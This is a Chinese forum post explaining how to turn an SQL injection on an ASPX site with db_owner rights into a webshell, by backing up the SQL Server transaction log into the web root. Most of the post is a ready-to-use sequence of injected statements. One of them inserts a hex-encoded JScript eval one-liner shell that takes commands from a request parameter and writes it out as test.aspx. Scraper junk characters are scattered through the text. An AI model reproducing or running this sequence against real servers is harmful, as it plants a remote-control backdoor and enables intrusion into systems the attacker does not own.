最近在看个网站的时候,aspx的字符型注点,db_owner权限,但是不支持asp,常见的方法是log备份asp,这次我们要备份aspx了(在这只讨论备份)。0 v3 _! F, ?$ T9 _' ~" y
但是直接写一句话虽然可以备份成功,但是执行时会报错,因此直接备份的一句话是无法执行的。
& ]& N4 q" ^% E3 U9 ~- f# ~经过查找资料和本人测试发现,利用ie备份的时候,insert时,向表中插入内容,都是重复插入3条数据(ie6,ie8均如此),因此导致执行时出错;利用查询分析器insert的时候,只插入一条数据,因此不会报错,所以一句话成功执行。
. G F: j: g( y# k. P( T) `经测试,备份如下格式:空格一句话空格、<br>一句话<br>时,有一定概率可以成功。不知道是什么原因,特来论坛请教,望高手解惑。
3 {, k1 R$ [: c! E
; g+ _& O1 h7 f2 {--------------------------------------------------------------
2 I4 m$ B+ g! K# Z今天又试了下,发现直接备份有时候也可以成功,晕死了,为防止备份时插入多条内容导致出错,
, M8 v f2 G. K9 \" ^; }自己修改备份语句如下:) l. D- E! @# C! ^9 _
Drop table cmd;--
9 D! l8 Q+ i& K3 salter database db_test set RECOVERY FULL;--) B& s u& T* Z- @2 F. n3 K
create table cmd (a image,id int IDENTITY (1,1)); --添加了个自动编号的字段& D; P. ]8 D+ {: f6 e, o' x/ V
backup log db_test to disk = 'c:\bak' with init;--1 ?* N* I0 Z* L8 q Q4 M* d
insert into cmd (a) values(0x3C25402050616765204C616E67756167653D224A73637269707422253E3C256576616C28526571756573742E4974656D5B227A225D2C22756E7361666522293B253E);--
( V, D$ Y, E, J1 Bdelete from cmd where id>1;--删除id>1的数据& J5 l! J! \$ ?: }/ c+ X* {( Y$ Z f
backup log db_test to disk = 'e:\webroot\test.aspx';--
$ M. t( W: y+ x$ I4 ]- lDrop table cmd;--
( [. u: \3 R1 n/ J) t1 @希望对大家有用。 |